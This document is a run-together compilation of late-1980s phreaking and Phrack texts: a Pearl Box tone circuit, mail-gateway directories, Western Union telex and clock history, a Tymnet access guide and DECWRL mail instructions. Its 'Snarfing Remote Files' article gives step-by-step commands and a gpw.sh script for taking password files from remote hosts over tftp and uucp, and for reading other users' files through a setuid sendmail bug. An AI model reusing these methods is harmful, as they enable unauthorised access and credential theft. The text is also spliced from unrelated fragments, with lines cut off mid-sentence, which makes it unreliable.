A Pearl Box can be used to create any tone you wish that other boxesmay not. It also has a tone sweep option that can be used for numerousthings like detecting different types of phone tapping devices.
Parts List:

CD4049 RCA integrated circuit .1 uF disk capacitor 1 uF 16V electrolitic capacitor 1K resistor 10M resistor 1meg pot 1N914 diode Some SPST momentary push-button switches 1 SPDT toggle switch 9 Volt battery & clip and miscellaneous stuff you should have laying around the house.
State-of-the-Art-Text Schematic: + 16V 1uF - ____________________________________ ! ! _ _______________________ __________ / 8ohms ___________:____:___ __________ 9 10 11 12 13 14 15 16 _\ CD4049UBE _1__2__3__4__5__6__7__8_ : _ __ __ _____________________________[-] ! ! : [b] __________________________ [a] : : [t] ! 1N914 ! ! [t] ___________/_____________________________________[+] : \ : : 10M ___/\/\/\__ _________ <-- These 2 wires to the centerpole of switch. .1uF 50V _______________________ _____________________________ ___[Toggle Switch]____________ ___ o o /\/\/\___ __ _/\/\/\____/\/\/\ ^ 1K ^ ____ ___ ___ o o /\/\/\___ __ (pAakala Administrator: Gary W. KrumbineGen Directorate Of Post & AT&T Information SystemsPhone: 35806921730 Lincroft, NJ 07738 Phone: +1 201 576 2658
MHS Gateway: mhs!telemail MHS Gateway: mhsAdministrator: Jim Kelsay Administrator: AT&T Mail MHSGTE Telenet Comm Corp GatewayReston, VA 22096 AT&TPhone: +1 703 689 6034 Lincroft, NJ 08838
Phone: +1 800 624 5672
CMR~~~Previously known as Intermail, the Commercial Mail Relay (CMR) Service is amail relay service between the Internet and three commercial electronicmailsystems: US Sprint/Telenet, MCI-Mail, and DIALCOM systems (i.e. Compmail,NSFMAIL, and USDA-MAIL).
An important note: The only requirement for using this mail gateway isthatthe work conducted
==Phrack Inc.==
Volume Three, Issue 28, File #6 of 12 +++++++++++++++++++++++++++++++++++++ + + + Snarfing Remote Files + + + + by + + + + Dark OverLord + + + +++++++++++++++++++++++++++++++++++++
There are many ways of getting copies of files from a remote system thatyoudo not have permission to read or an account on login on to and access themthrough. Many administrators do not even bother to restrict many accesspoints that you can use.
Here are the simplest ways:
A) Use uucp(1) [Trivial File Transfer Protocol] to retrieve a copy of a file if you are running on an Internet based network.
B) Abuse uucp(1) [Unix to Unix Copy Program] to retrieve a copy of a file if uucp connections are running on that system.
C) Access one of many known security loopholes.
In the following examples, we will use the passwd file as the file toacquiresince it is a readable file that can be found on most systems that theseattacks are valid on.
Method A :
1) First start the tftp program: Enter the command:
tftp
[You have the following prompt:]

tftp>
2) The next step is to connect to the system that you wish to retrievefiles from. At the tftp, type:
tftp> connect other.system.com
3) Now request the file you wish to get a copy of (in our case, the passwd file /etc/passwd ):
tftp> get /etc/passwd /tmp/passwd
[You should see something that looks like the following:]
Received 185659 bytes in 22 seconds.
4) Now exit the tftp program with the "quit" command:
tftp> quit
You should now have a copy of other.system.com's passwd file in yourdirectory.
NOTE: Some Unix systems' tftp programs have a different syntax. The abovewas tested under SunOS 4.0
For example, on Apollos, the syntax is:
tftp -{gg!prw} [netasciiimage]
Thus you must use the command:
tftp -g password_file networked-host /etc/passwd
Consult your local "man" pages for more info (or in other words RTFM).
At the end of this article, I will include a shell script that will snarf apassword file from a remote host. To use it type:
gpw system_name
Method B :
Assuming we are getting the file /etc/passwd from the system uusucker,andour system has a direct uucp connection to that system, it is possible torequest a copy of the file through the uucp links. The following commandwillrequest that a copy of the passwd file be copied into uucp's home directory/usr/spool/uucppublic :
uucp -m uusucker!/etc/passwd '>uucp/uusucker_passwd'
The flag "-m" means you will be notified by mail when the transfer iscompleted.
Method C:
The third possible way to access the desired file requires that youhavethe login permission to the system.
In this case we will utilize a well-known bug in Unix's sendmail daemon.
The sendmail program has and option "-C" in which you can specify theconfiguration file to use (by default this file is /usr/lib/sendmail.cf or/etc/sendmail.cf). It should also be noted that the diagnostics outputtedbysendmail contain the offending lines of text. Also note that the sendmailprogram runs setuid root.
The way you can abuse this set of facts (if you have not yet guessed) is byspecifying the file you wish read as the configuration file. Thus thecommand:
sendmail -C/usr/accounts/random_joe/private/file
Will give you a copy of random joe's private file.
Another similar trick is to symlink your .mailcf file to joe's file andmailsomeone. When mail executes sendmail (to send the mail), it will load inyourmailcf and barf out joe's stuff.
First, link joe's file to your .mailcf .
ln -s /usr/accounts/random_joe/private/file $HOME/.mailcf
Next, send mail to someone.
mail C488869@umcvmb.missouri.edu
And have fun.
-=-Cut Here=-=-=-Cut Here=-=-=- gpw.sh =-=-=-Cut Here=-=-=-=-CutHere=-=-=-=-=:: gpw copyright(c) Dark Overlord:/usr/ucb/tftp $1 << EOFmode asciiverbosetraceget /etc/passwd /tmp/pw.$1quitEOF-=-Cut Here=-=-=-Cut Here=-=-=-Cut Here=-=-=-Cut Here=-=-=-=-CutHere=-=-=-=-=___________________________________________________________________________¼____
‡** END OF MESSAGE **#EOI

[M] PHRACK: Type
==Phrack Inc==
Volume Three, Issue 30, File #10 of 12
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= === === === Western Union === === Telex, TWX, and Time Service === === === === by Phone Phanatic === === === === September 17, 1989 === === === =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
"Until a few years ago -- maybe ten -- it was very common to see TWX and Telex machines in almost every business place."
There were only minor differences between Telex and TWX. The biggestdifference was that the former was always run by Western Union, while thelatter was run by the Bell System for a number of years. TWX literallymeant"(T)ype(W)riter e(x)change," and it was Bell's answer to competition fromWestern Union. There were "three row" and "four row" machines, meaning thenumber of keys on the keyboard and how they were laid out. The "three row"machines were simply part of the regular phone network; that is, they coulddial out and talk to another TWX also connected on regular phone lines.
Eventually these were phased out in favor of "newer and more improved"machineswith additional keys, as well as a paper tape reader attachment whichallowedsending the same message repeatedly to many different machines. These"fourrow" machines were not on the regular phone network, but were assignedtheirown area codes (410-510-610-710-810-910) where they still remain today.Theonly way a four row machine could call a three row machine or vice-versawasthrough a gateway of sorts which translated some of the character setunique toeach machine.
Western Union's network was called Telex and in addition to being able tocontact (by dial up) other similar machines, Telex could connect with TWX(andvice-versa) as well as all the Western Union public offices around thecountry.Until the late 1950's or early 1960's, every small town in America had aWestern Union office. Big cities like Chicago had perhaps a dozen of them,
andthey used messengers to hand deliver telegrams around town. Telegramscould beplaced in person at any public office, or could be called in to the nearestpublic office.
By arrangement with most telcos, the Western Union office in town nearlyalwayshad the phone number 4321, later supplemented in automated exchanges withsomeprefix XXX-4321. Telegrams could be charged to your home phone bill (thisisstill the case in some communities) and from a coin phone, one did not askfor4321, but rather, called the operator and asked for Western Union. Thiswasnecessary since once the telegram had been given verbally to the wireclerk,s/he in turn had to flash the hook and get your operator back on the linetotell them "collect five dollars and twenty cents" or whatever the cost was.Telegrams, like phone calls, could be sent collect or billed third party.Ifyou had an account with Western Union, i.e. a Telex machine in your office,youcould charge the calls there, but most likely you would simply send thetelegram from there in the first place.
Sometime in the early 1960's, Western Union filed suit against AT&T askingthatthey turn over their TWX business to them. They cited an earlier courtruling,circa 1950's, which said AT&T was prohibited from acquiring any moretelephoneoperating companies except under certain conditions. The Supreme Courtagreedwith Western Union that "spoken messages" were the domain of Ma Bell, but"written messages" were the domain of Western Union. So Bell was requiredtodivest itself of the TWX network, and Western Union has operated it since,although a few years ago they began phasing out the phrase "TWX" in favorof"Telex II"; their original device being "Telex I" of course. TWX stillusesten digit dialing with 610 (Canada) or 710/910 (USA) being the leadingthreedigits. Apparently 410-510 have been abandoned; or at least they are usedverylittle, and Bellcore has assigned 510 to the San Francisco area starting inayear or so. 410 still has some funny things on it, like the Western Union"Infomaster," which is a computer that functions like a gateway betweenTelex,TWX, EasyLink and some other stuff.
Today, the Western Union network is but a skeleton of its former self. Nowmost of their messages are handled on dial up terminals connected to thepublic
phone network. It has been estimated the TWX/Telex business is about fiftypercent of what it was a decade ago, if that much.
Then there was the Time Service, a neat thing which Western Union offeredforover seventy years, until it was discontinued in the middle 1960's. TheTimeService provided an important function in the days before alternatingcurrentwas commonly available. For example, Chicago didn't have AC electricityuntilabout 1945. Prior to that we used DC, or direct current.
Well, to run an electric clock, you need 60 cycles AC current for obviousreasons, so prior to the conversion from DC power to AC power, electricwallclocks such as you see in every office were unheard of. How were people totell the time of day accurately? Enter the Western Union clock.
The Western Union, or "telegraph clock" was a spring driven wind up clock,butwith a difference. The clocks were "perpetually self-winding,"manufactured bythe Self-Winding Clock Company of New York City. They had large batteriesinside them, known as "telephone cells" which had a life of about ten yearseach. A mechanical contrivance in the clock would rotate as the clockspringunwound, and once each hour would cause two metal clips to contact foraboutten seconds, which would pass juice to the little motor in the clock whichinturn re-wound the main spring. The principle was the same as the batteryoperated clocks we see today. The battery does not actually run the clock--direct current can't do that -- but it does power the tiny motor whichre-windsthe spring which actually drives the clock.
The Western Union clocks came in various sizes and shapes, ranging from thesmallest dials which were nine inches in diameter to the largest which wereabout eighteen inches in diameter. Some had sweep second hands; others didnot. Some had a little red light bulb on the front which would flash. Thetypical model was about sixteen inches, and was found in offices, schools,transportation depots, radio station offices, and of course in thetelegraphoffice itself.
The one thing all the clocks had in common was their brown metal case andcream-colored face, with the insignia "Western Union" and their corporatelogoin those days which was a bolt of electricity, sort of like a letter "Z"layingon its side. And in somewhat smaller print below, the words "NavalObservatoryTime."
The local clocks in an office or school or wherever were calibrated by a"master clock" (actually a sub-master) on the premises. Once an hour on
thehour, the (sub) master clock would drop a metal contact for just a halfsecond,and send about nine volts DC up the line to all the local clocks. They inturnhad a "tolerance" of about two minutes on both sides of the hour so thatthecurrent coming to them would yank the minute hand exactly upright onto thetwelve from either direction if the clock was fast or slow.
The sub-master clocks in each building were in turn serviced by the masterclock in town; usually this was the one in the telegraph office. Everyhour onthe half hour, the master clock in the telegraph office would throw currenttothe sub-masters, yanking them into synch as required. And as for thetelegraphoffices themselves, they were serviced twice a day by -- you guessed it --theNaval Observatory Master clock in Our Nation's Capitol, by the sameroutine.Someone there would press half a dozen buttons at the same time, using allavailable fingers; current would flow to every telegraph office and synchallthe master clocks in every community. Western Union charged fifty centspermonth for the service, and tossed the clock in for free! Oh yes, there wasaninstallation charge of about two dollars when you first had service (i.e. aclock) installed.
The clocks were installed and maintained by the "clockman," a technicianfromWestern Union who spent his day going around hanging new clocks, takingthemout of service, changing batteries every few years for each clock, etc.
What a panic it was for them when "war time" (what we now call DaylightSavingsTime) came around each year! Wally, the guy who serviced all the clocks indowntown Chicago had to start on *Thursday* before the Sunday officialchangeover just to finish them all by *Tuesday* following. He wouldliterallyrush in an office, use his screwdriver to open the case, twirl the hourhandaround one hour forward in the spring, (or eleven hours *forward* in thefallsince the hands could not be moved backward beyond the twelve goingcounterclockwise), slam the case back on, screw it in, and move down thehallto the next clock and repeat the process. He could finish several dozenclocksper day, and usually the office assigned him a helper twice a year fortheseevents.
He said they never bothered to line the minute hand up just right, becauseit
would have taken too long, and ".....anyway, as long as we got it within aminute or so, it would synch itself the next time the master clock sent asignal..." Working fast, it took a minute to a minute and a half to openthecase, twirl the minute hand, put the case back on, "stop and b.s. with thereceptionist for a couple seconds" and move along.
The master clock sent its signal over regular telco phone lines. Usuallyitwould terminate in the main office of whatever place it was, and the (sub)master there would take over at that point.
Wally said it was very important to do a professional job of hanging theclockto begin with. It had to be level, and the pendulum had to be just right,otherwise the clock would gain or lose more time than could be accommodatedinthe hourly synching process. He said it was a very rare clock thatactuallywas out by even a minute once an hour, let alone the two minutes oftolerancebuilt into the gear works.
"...Sometimes I would come to work on Monday morning, and find out in the office that the clock line had gone open Friday evening. So nobody all weekend got a signal. Usually I would go down a manhole and find it open someplace where one of the Bell guys messed it up, or took it off and never put it back on. To find out where it was open, someone in the office would 'ring out' the line; I'd go around downtown following the loop as we had it laid out, and keep listening on my headset for it. When I found the break or the open, I would tie it down again and the office would release the line; but then I had to go to all the clocks *before* that point and restart them, since the constant current from the office during the search had usually caused them to stop."
But he said, time and again, the clocks were usually so well mounted andhungthat "...it was rare we would find one so far out of synch that we had toadjust it manually. Usually the first signal to make it through once Irepaired the circuit would yank everyone in town to make up for whatevertheylost or gained over the weekend..."
In 1965, Western Union decided to discontinue the Time Service. In anostalgicletter to subscribers, they announced their decision to suspend operationsatthe end of the current month, but said "for old time's sake" anyone who hadaclock was welcome to keep it and continue using it; there just would not beanysetting signals from the master clocks any longer.
Within a day or two of the official announcement, every Western Union clockinthe Chicago area headquarters building was gone. The executives snatchedthem
off the wall, and took them home for the day when they would havehistoricalvalue. All the clocks in the telegraph offices disappeared about the sametime, to be replaced with standard office-style electric wall clocks.___________________________________________________________________________¼____

==Phrack Inc.==
Volume Three, Issue 30, File #3 of 12
[-][-] [-][-] [-][-] [-][-] [-][-] [-][-] [-][-] [-] [-] [-] Hacking & Tymnet [-] [-] [-] [-] by [-] [-] [-] [-] Synthecide [-] [-] [-] [-][-] [-][-] [-][-] [-][-] [-][-] [-][-] [-][-]
There are literally hundreds of systems connected to some of these largernetworks, like Tymnet and Telenet. Navigation around these networks isverysimple, and usually well explained in their on-line documentation.Furthermore, some systems will actually tell you what is connected and howtoget to it. In the case of Tymnet, after dialing in, at the log in prompt,type"information" for the on-line documentation.
Accessing systems through networks is as simple as providing an address foritto connect to. The best way to learn about the addresses and how to dothingson a network is to read "A Novice's Guide to Hacking (1989 Edition)" whichwasin Issue 22, File 4 of 12, Volume Two (December 23, 1988). Some points arere-iterated here.
Once on a network, you provide the NUA (network user address) of the systemyouwish to connect to. NUAs are strings of 15 digits, broken up in to 3fields,the NETWORK ADDRESS, the AREA PREFIX, and the DNIC. Each field has 5digits,and are left padded with 0's where necessary.
The DNIC determines which network to take the address from. Tymnet, forexample, is 03106. 03110 is Telenet.
The AREA PREFIX and NETWORK ADDRESS determine the connection point. Byproviding the address of the system that you wish to connect to, you willbeaccessing it through the net... as if you were calling it directly.
Obviously,then, this provides one more level of security for access.
By connecting to an outdial, you can increase again the level of securityyouenjoy, by using the outdial in that area to connect to the remote system.
Addendum -- Accessing Tymnet Over Local Packet Networks
This is just another way to get that extra step and/or bypass other routes.This table is copied from Tymnet's on-line information. As said earlier,it'sa great resource, this on-line information!
BELL ATLANTIC
NODE CITY STATE SPEED ACCESS NUMBERNTWK ---- ------------------- -------------- ------ ---------------- 03526 DOVER DELAWARE 300/2400 302/734-9465@PDN 03526 GEORGETOWN DELAWARE 300/2400 302/856-7055@PDN 03526 NEWARK DELAWARE 300/2400 302/366-0800@PDN 03526 WILMINGTON DELAWARE 300/1200 302/428-0030@PDN 03526 WILMINGTON DELAWARE 2400 302/655-1144@PDN
06254 WASHINGTON DIST. OF COL. 300/1200 202/479-7214@PDN 06254 WASHINGTON (MIDTOWN) DIST. OF COL. 2400 202/785-1688@PDN 06254 WASHINGTON (DOWNTOWN) DIST. OF COL. 300/1200 202/393-6003@PDN 06254 WASHINGTON (MIDTOWN) DIST. OF COL. 300/1200 202/293-4641@PDN 06254 WASHINGTON DIST. OF COL. 300/1200 202/546-5549@PDN 06254 WASHINGTON DIST. OF COL. 300/1200 202/328-0619@PDN
06254 BETHESDA MARYLAND 300/1200 301/986-9942@PDN 06254 COLESVILLE MARYLAND 300/2400 301/989-9324@PDN 06254 HYATTSVILLE MARYLAND 300/1200 301/779-9935@PDN 06254 LAUREL MARYLAND 300/2400 301/490-9971@PDN 06254 ROCKVILLE MARYLAND 300/1200 301/340-9903@PDN 06254 SILVER SPRING MARYLAND 300/1200 301/495-9911@PDN

07771 BERNARDSVILLE NEW JERSEY 300/2400 201/766-7138@PDN 07771 CLINTON NEW JERSEY 300-1200 201/730-8693@PDN 07771 DOVER NEW JERSEY 300/2400 201/361-9211@PDN 07771 EATONTOWN/RED BANK NEW JERSEY 300/2400 201/758-8000@PDN 07771 ELIZABETH NEW JERSEY 300/2400 201/289-5100@PDN 07771 ENGLEWOOD NEW JERSEY 300/2400 201/871-3000@PDN 07771 FREEHOLD NEW JERSEY 300/2400 201/780-8890@PDN 07771 HACKENSACK NEW JERSEY 300/2400 201/343-9200@PDN 07771 JERSEY CITY NEW JERSEY 300/2400 201/659-3800@PDN 07771 LIVINGSTON NEW JERSEY 300/2400 201/533-0561@PDN 07771 LONG BRANCH/RED BANK NEW JERSEY 300/2400 201/758-8000@PDN 07771 MADISON NEW JERSEY 300/2400 201/593-0004@PDN 07771 METUCHEN NEW JERSEY 300/2400 201/906-9500@PDN 07771 MIDDLETOWN NEW JERSEY 300/2400 201/957-9000@PDN 07771 MORRISTOWN NEW JERSEY 300/2400 201/455-0437@PDN 07771 NEWARK NEW JERSEY 300/2400 201/623-0083@PDN 07771 NEW BRUNSWICK NEW JERSEY 300/2400 201/247-2700@PDN 07771 NEW FOUNDLAND NEW JERSEY 300/2400 201/697-9380@PDN 07771 PASSAIC NEW JERSEY 300/2400 201/473-6200@PDN 07771 PATERSON NEW JERSEY 300/2400 201/345-7700@PDN 07771 PHILLIPSBURG NEW JERSEY 300/2400 201/454-9270@PDN 07771 POMPTON LAKES NEW JERSEY 300/2400 201/835-8400@PDN 07771 RED BANK NEW JERSEY 300/2400 201/758-8000@PDN 07771 RIDGEWOOD NEW JERSEY 300/2400 201/445-4800@PDN 07771 SOMERVILLE NEW JERSEY 300/2400 201/218-1200@PDN 07771 SOUTH RIVER NEW JERSEY 300/2400 201/390-9100@PDN 07771 SPRING LAKE NEW JERSEY 300/2400 201/974-0850@PDN 07771 TOMS RIVER NEW JERSEY 300/2400 201/286-3800@PDN 07771 WASHINGTON NEW JERSEY 300/2400 201/689-6894
@PDN 07771 WAYNE/PATERSON NEW JERSEY 300/2400 201/345-7700@PDN
03526 ALLENTOWN PENNSYLVANIA 300/1200 215/435-0266@PDN 11301 ALTOONA PENNSYLVANIA 300/1200 814/946-8639@PDN 11301 ALTOONA PENNSYLVANIA 2400 814/949-0505@PDN 03526 AMBLER PENNSYLVANIA 300/1200 215/283-2170@PDN 10672 AMBRIDGE PENNSYLVANIA 300/1200 412/266-9610@PDN 10672 CARNEGIE PENNSYLVANIA 300/1200 412/276-1882@PDN 10672 CHARLEROI PENNSYLVANIA 300/1200 412/483-9100@PDN 03526 CHESTER HEIGHTS PENNSYLVANIA 300/1200 215/358-0820@PDN 03526 COATESVILLE PENNSYLVANIA 300/1200 215/383-7212@PDN 10672 CONNELLSVILLE PENNSYLVANIA 300/1200 412/628-7560@PDN 03526 DOWNINGTON/COATES. PENNSYLVANIA 300/1200 215/383-7212@PDN 03562 DOYLESTOWN PENNSYLVANIA 300/1200 215/340-0052@PDN 03562 GERMANTOWN PENNSYLVANIA 300/1200 215-843-4075@PDN 10672 GLENSHAW PENNSYLVANIA 300/1200 412/487-6868@PDN 10672 GREENSBURG PENNSYLVANIA 300/1200 412/836-7840@PDN 11301 HARRISBURG PENNSYLVANIA 300/1200 717/236-3274@PDN 11301 HARRISBURG PENNSYLVANIA 2400 717/238-0450@PDN 10672 INDIANA PENNSYLVANIA 300/1200 412/465-7210@PDN 03526 KING OF PRUSSIA PENNSYLVANIA 300/1200 215/270-2970@PDN 03526 KIRKLYN PENNSYLVANIA 300/1200 215/789-5650@PDN 03526 LANSDOWNE PENNSYLVANIA 300/1200 215/626-9001@PDN 10672 LATROBE PENNSYLVANIA 300/1200 412/537-0340@PDN 11301 LEMOYNE/HARRISBURG PENNSYLVANIA 300/1200 717/236-3274@PDN 10672 MCKEESPORT PENNSYLVANIA 300/1200 412/673-6200@PDN 10672 NEW CASTLE PENNSYLVANIA 300/1200 412/658-5982@PDN 10672 NEW KENSINGTON PENNSYLVANIA 300/1200 412/337-0510@PDN 03526 NORRISTOWN PENNSYLVANIA 300/1200 215/270-2970
@PDN 03526 PAOLI PENNSYLVANIA 300/1200 215/648-0010@PDN 03562 PHILADELPHIA PENNSYLVANIA 300/1200 215/923-7792@PDN 03562 PHILADELPHIA PENNSYLVANIA 300/1200 215/557-0659@PDN 03562 PHILADELPHIA PENNSYLVANIA 300/1200 215/545-7886@PDN 03562 PHILADELPHIA PENNSYLVANIA 300/1200 215/677-0321@PDN 03562 PHILADELPHIA PENNSYLVANIA 2400 215/625-0770@PDN 10672 PITTSBURGH PENNSYLVANIA 300/1200 412/281-8950@PDN 10672 PITTSBURGH PENNSYLVANIA 300/1200 412-687-4131@PDN 10672 PITTSBURGH PENNSYLVANIA 2400 412/261-9732@PDN 10672 POTTSTOWN PENNSYLVANIA 300/1200 215/327-8032@PDN 03526 QUAKERTOWN PENNSYLVANIA 300/1200 215/538-7032@PDN 03526 READING PENNSYLVANIA 300/1200 215/375-7570@PDN 10672 ROCHESTER PENNSYLVANIA 300/1200 412/728-9770@PDN 03526 SCRANTON PENNSYLVANIA 300/1200 717/348-1123@PDN 03526 SCRANTON PENNSYLVANIA 2400 717/341-1860@PDN 10672 SHARON PENNSYLVANIA 300/1200 412/342-1681@PDN 03526 TULLYTOWN PENNSYLVANIA 300/1200 215/547-3300@PDN 10672 UNIONTOWN PENNSYLVANIA 300/1200 412/437-5640@PDN 03562 VALLEY FORGE PENNSYLVANIA 300/1200 215/270-2970@PDN 10672 WASHINGTON PENNSYLVANIA 300/1200 412/223-9090@PDN 03526 WAYNE PENNSYLVANIA 300/1200 215/341-9605@PDN 10672 WILKINSBURG PENNSYLVANIA 300/1200 412/241-1006@PDN
06254 ALEXANDRIA VIRGINIA 300/1200 703/683-6710@PDN 06254 ARLINGTON VIRGINIA 300/1200 703/524-8961@PDN 06254 FAIRFAX VIRGINIA 300/1200 703/385-1343@PDN 06254 MCLEAN VIRGINIA 300/1200 703/848-2941@PDN
@PDN BELL ATLANTIC - NETWORK NAME IS PUBLIC DATA NETWORK (PDN)

(CONNECT MESSAGE) . _. _. _<> _ (SYNCHRONIZES DATA SPEEDS)
WELCOME TO THE BPA/DST PDN
*. _T _ _<> _ (TYMNET ADDRESS)
131069 (ADDRESS CONFIRMATION - TYMNET DNIC) COM (CONFIRMATION OF CALL SET-UP)
-GWY 0XXXX- TYMNET: PLEASE LOG IN: (HOST # WITHIN DASHES)
BELL SOUTH
NODE CITY STATE DENSITY ACCESS NUMBERMODEM ----- -------------------- -------------- ------ ----------------- 10207 ATLANTA GEORGIA 300/1200 404/261-4633@PLSK 10207 ATHENS GEORGIA 300/1200 404/354-0614@PLSK 10207 COLUMBUS GEORGIA 300/1200 404/324-5771@PLSK 10207 ROME GEORGIA 300/1200 404/234/7542@PLSK
@PLSK BELLSOUTH - NETWORK NAME IS PULSELINK
(CONNECT MESSAGE)
. _. _. _ _<> _ (SYNCHRONIZES DATA SPEEDS) (DOES NOT ECHO TO THE TERMINAL) CONNECTED PULSELINK
1 _3 _1 _0 _6 _ (TYMNET ADDRESS) (DOES NOT ECHO TO THE TERMINAL)
PULSELINK: CALL CONNECTED TO 1 3106
-GWY 0XXXX- TYMNET: PLEASE LOG IN: (HOST # WITHIN DASHES)
PACIFIC BELL
NODE CITY STATE DENSITY ACCESS NUMBERNTWK ----- ------------------- -------------- ------ ---------------- 03306 BERKELEY CALIFORNIA 300/1200 415-548-2121@PPS
06272 EL SEGUNDO CALIFORNIA 300/1200 213-640-8548@PPS 06272 FULLERTON CALIFORNIA 300/1200 714-441-2777@PPS 06272 INGLEWOOD CALIFORNIA 300/1200 213-216-7667@PPS 06272 LOS ANGELES(DOWNTOWN) CALIFORNIA 300/1200 213-687-3727@PPS 06272 LOS ANGELES CALIFORNIA 300/1200 213-480-1677@PPS 03306 MOUNTAIN VIEW CALIFORNIA 300/1200 415-960-3363@PPS 03306 OAKLAND CALIFORNIA 300/1200 415-893-9889@PPS 03306 PALO ALTO CALIFORNIA 300/1200 415-325-4666@PPS 06272 PASADENA CALIFORNIA 300/1200 818-356-0780@PPS 03306 SAN FRANCISCO CALIFORNIA 300/1200 415-543-8275@PPS 03306 SAN FRANCISCO CALIFORNIA 300/1200 415-626-5380@PPS 03306 SAN FRANCISCO CALIFORNIA 300/1200 415-362-2280@PPS 03306 SAN JOSE CALIFORNIA 300/1200 408-920-0888@PPS 06272 SANTA ANNA CALIFORNIA 300/1200 714-972-9844@PPS 06272 VAN NUYS CALIFORNIA 300/1200 818-780-1066@PPS
@PPS PACIFIC BELL - NETWORK NAME IS PUBLIC PACKET SWITCHING (PPS)
(CONNECT MESSAGE)
. _. _. _<> (DOES NOT ECHO TO THE TERMINAL)
ONLINE 1200 WELCOME TO PPS: 415-XXX-XXXX 1 _3 _1 _0 _6 _9 _ (TYMNET ADDRESS) (DOES NOT ECHO UNTIL TYMNET RESPONDS)
-GWY 0XXXX- TYMNET: PLEASE LOG IN: (HOST # WITHIN DASHES)
SOUTHWESTERN BELL
NODE CITY STATE DENSITY ACCESS NUMBERSNWRK ----- -------------------- -------------- ------- ----------------- 05443 KANSAS CITY KANSAS 300/1200 316/225-9951@MRLK 05443 HAYS KANSAS 300/1200 913/625-8100@MRLK 05443 HUTCHINSON KANSAS 300/1200 316/669-1052@MRLK
05443 LAWRENCE KANSAS 300/1200 913/841-5580@MRLK 05443 MANHATTAN KANSAS 300/1200 913/539-9291@MRLK 05443 PARSONS KANSAS 300/1200 316/421-0620@MRLK 05443 SALINA KANSAS 300/1200 913/825-4547@MRLK 05443 TOPEKA KANSAS 300/1200 913/235-1909@MRLK 05443 WICHITA KANSAS 300/1200 316/269-1996@MRLK
04766 BRIDGETON/ST. LOUIS MISSOURI 300/1200 314/622-0900@MRLK 04766 ST. LOUIS MISSOURI 300/1200 314/622-0900@MRLK
06510 ADA OKLAHOMA 300/1200 405/4
On a side note, the recent book The Cuckoo's Egg provides some interestinginformation (in the form of a story, however) on a Tymnet hacker. Rememberthat he was into BIG things, and hence he was cracked down upon. If youkeep alow profile, networks should provide a good access method.
If you can find a system that is connected to the Internet that you can getonfrom Tymnet, you are doing well.___________________________________________________________________________¼____
==Phrack Inc.==
Volume Three, Issue 30, File #5 of 12
()()()()()()()()()()()()()()()()()()() () () () The DECWRL Mail Gateway () () () () by Dedicated Link () () () () September 20, 1989 () () () ()()()()()()()()()()()()()()()()()()()
INTRODUCTION
DECWRL is a mail gateway computer operated by Digital's Western ResearchLaboratory in Palo Alto, California. Its purpose is to support theinterchangeof electronic mail between Digital and the "outside world."
DECWRL is connected to Digital's Easynet, and also to a number of differentoutside electronic mail networks. Digital users can send outside mail bysending to DECWRL::"outside-address", and digital users can also receivemailby having your correspondents route it through DECWRL. The details ofincomingmail are more complex, and are discussed below.
It is vitally important that Digital employees be good citizens of thenetworksto which we are connected. They depend on the integrity of our usercommunityto ensure that tighter controls over the use of the gateway are notrequired.The most important rule is "no chain letters," but there are other rulesdepending on whether the connected network that you are using is commercialornon-commercial.
The current traffic volume (September 1989) is about 10,000 mail messagesperday and about 3,000 USENET messages per day. Gatewayed mail traffic hasdoubled every year since 1983. DECWRL is currently a Vax 8530 computerwith 48megabytes of main memory, 2500 megabytes of disk space, 8 9600-baud(Telebit)modem ports, and various network connections. They will shortly beupgradingto a Vax 8650 system. They run Ultrix 3.0 as the base operating system.
ADMINISTRATION
The gateway has engineering staff, but no administrative or clerical staff.They work hard to keep it running, but they do not have the resources toanswertelephone queries or provide tutorials in its use.
They post periodic status reports to the USENET newsgroup dec.general.Varioushelpful people usually copy these reports to the VAXNOTES "gateways"conferencewithin a day or two.
HOW TO SEND MAIL
DECWRL is connected to quite a number of different mail networks. If youwerelogged on directly to it, you could type addresses directly, e.g.
To: strange!foreign!address.
But since you are not logged on directly to the gateway, you must send mailsothat when it arrives at the gateway, it will be sent as if that address hadbeen typed locally.

* Sending from VMS
If you are a VMS user, you should use NMAIL, because VMS mail does not knowhowto requeue and retry mail when the network is congested or disconnected.FromVMS, address your mail like this:
To: nm%DECWRL::"strange!foreign!address"
The quote characters (") are important, to make sure that VMS doesn't trytointerpret strange!foreign!address itself. If you are typing such anaddressinside a mail program, it will work as advertised. If you are using DCLandtyping directly to the command line, you should beware that DCL likes toremovequotes, so you will have to enclose the entire address in quotes, and thenputtwo quotes in every place that one quote should appear in the address:
$ mail test.msg "nm%DECWRL::""foreign!addr""" /subj="hello"
Note the three quotes in a row after foreign!addr. The first two of themaredoubled to produce a single quote in the address, and the third ends theaddress itself (balancing the quote in front of the nm%).
Here are some typical outgoing mail addresses as used from a VMS system:
To: nm%DECWRL::"lll-winkin!netsys!phrack" To: nm%DECWRL::"postmaster@msp.pnet.sc.edu" To: nm%DECWRL::"netsys!phrack@uunet.uu.net" To: nm%DECWRL::"phrackserv@CUNYVM.bitnet" To: nm%DECWRL::"Chris.Jones@f654.n987.z1.fidonet.org"
* Sending from Ultrix
If your Ultrix system has been configured for it, then you can, from yourUltrix system, just send directly to the foreign address, and the mailsoftwarewill take care of all of the gateway routing for you. Most Ultrix systemsinCorporate Research and in the Palo Alto cluster are configured this way.
To find out whether your Ultrix system has been so configured, just try itandsee what happens. If it doesn't work, you will receive notification almostinstantly.
NOTE: The Ultrix mail system is extremely flexible; it is almost completely configurable by the customer. While this is valuable to customers, it makes it very difficult to write global instructions for the use of Ultrix mailers, because it is possible that the localchanges
have produced something quite unlike the vendor-delivered mailer. Oneof the popular changes is to tinker with the meaning of quote characters(") in Ultrix addresses. Some systems consider that these two addressesare the same:
site1!site2!user@host.dec.com
and
"site1!site2!user"@host.dec.com
while others are configured so that one form will work and the other will not. All of these examples use the quotes. If you have trouble getting the examples to work, please try them again without the quotes. Perhaps your Ultrix system is interpreting the quotes differently.
If your Ultrix system has an IP link to Palo Alto (type "/etc/pingdecwrl.dec.com" to find out if it does), then you can route your mail tothegateway via IP. This has the advantage that your Ultrix mail headers willreach the gateway directly, instead of being translated into DECNET mailheaders and then back into Ultrix at the other end. Do this as follows:
To: "alien!address"@decwrl.dec.com
The quotes are necessary only if the alien address contains a ! character,butthey don't hurt if you use them unnecessarily. If the alien addresscontainsan "@" character, you will need to change it into a "%" character. Forexample, to send via IP to joe@widget.org, you should address the mail
To: "joe%widget.org"@decwrl.dec.com
